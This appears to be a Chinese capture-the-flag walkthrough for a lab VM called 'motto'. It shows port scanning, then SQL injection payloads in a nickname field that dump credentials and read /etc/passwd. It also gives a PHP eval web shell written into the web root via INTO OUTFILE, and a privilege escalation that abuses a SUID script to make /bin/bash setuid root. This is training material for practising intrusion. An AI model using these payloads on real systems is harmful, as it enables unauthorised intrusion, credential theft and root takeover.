3 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.10.0: 256 hosts scanned in 1.874 seconds (136.61 hosts/sec). 3 responded
端口扫描
1 2 3 4 5 6 7 8 9 10 11 12 13
┌──(root㉿kali)-[/home/kali] └─# nmap -p- 192.168.56.151 Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-02 22:35 EDT Nmap scan report for 192.168.56.151 Host is up (0.00068s latency). Not shown: 65532 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 9090/tcp open zeus-admin MAC Address: 08:00:27:38:7E:82 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 15.24 seconds
80端口
80端口只是一个前端小游戏,没什么切入点
3000端口
注册一个账号testtest:testtest登录进去
写一个Motto然后点击查看我的Motto就会显示出自己写的Motto
如果把昵称改为ta0的话 ,再查看Motto 就会显示ta0的Motto
改为ta0'则什么都不显示
改为ta0' -- aMotto信息又显示出来了
存在注入
方案1
ta0' union select 1,2, table_name from information_schema.tables where table_schema=database(); -- a
注一下表名
ta0' union select 1,2, column_name from information_schema.columns where table_schema=database() and table_name='register_infos'; -- a 注一下字段名
ta0' union select 1,username,password from register_infos; -- a看一下注册信息
这里拿到了RedBean的密码
不过还可以
ta0' union select 1,2,load_file('/etc/passwd'); -- a
看一下系统用户
有一个redbean用户
查出来的密码就是 redbean用户的密码
方案2
还可以通过ta1' union select 1,1,'<?php @eval($_POST[1]);?> into outfile '/var/www/html/config.php'; -- a往80端口的web服务写一个马
二、提权
ssh可以直接连上redbean用户
使用find / -perm -u=s -type f 2>/dev/null找到有一个/opt/run_newsh
echo -e "\033[1;34m[INFO]\033[0m Initializing environment checks:" for step in A B C; do echo -e "\033[1;33m ● Module ${step} status: OK (ver $(($RANDOM%5+1)).$(($RANDOM%20)).$(($RANDOM%500)))\033[0m" sleep 0.12 done
echo -e "\033[1;34m[INFO]\033[0m Running diagnostic sequence:" for step in {1..3}; do echo -e "\033[1;35m → Executing test ${step} of 3\033[0m" sleep 0.2 done
for ((i=WAIT_TIME; i>=0; i--)); do case $((i%4)) in 0) COL="34" ;; # 蓝 1) COL="32" ;; # 绿 2) COL="31" ;; # 红 3) COL="36" ;; # 青 esac
case $((i%2)) in 0) echo -e "\033[1;${COL}m>> Waiting T-${i} seconds...\033[0m" ;; 1) echo -e "\033[1;${COL}m>> Countdown: ${i}\033[0m" ;; esac
[ $i -gt 0 ] && sleep 1 done
RESULTS=( "Diagnostics complete." "All systems nominal." "No errors detected." "System stable." )
FINAL_MSG=${RESULTS[$RANDOM % ${#RESULTS[@]}]} echo -e "\033[1;32m${FINAL_MSG}\033[0m" echo -e "\033[1;34mThank you for using the system monitor.\033[0m"
redbean@motto:~$ mkdir test redbean@motto:~$ touch test/flag redbean@motto:~$ cd test/ redbean@motto:~/test$ /opt/run_newsh "*"
▓▒░ Loading system diagnostics ░▒▓ [INFO] Initializing environment checks: ● Module A status: OK (ver 1.12.97) ● Module B status: OK (ver 1.7.137) ● Module C status: OK (ver 4.16.344) Random seed value: 17150 [INFO] Evaluating input parameters... [INFO] Running diagnostic sequence: → Executing test 1 of 3 → Executing test 2 of 3 → Executing test 3 of 3
Waiting period: 2 seconds >> Waiting T-2 seconds... >> Countdown: 1 >> Waiting T-0 seconds... All systems nominal. Thank you for using the system monitor. [STATS] Summary Report: Processes checked: 68 /opt/new.sh: line 60: bc: command not found CPU load average: Uptime (hours): 83 redbean@motto:~/test$ ls -al /bin/bash -rwsr-sr-x 1 root root 1168776 Apr 18 2019 /bin/bash redbean@motto:~/test$
wechat
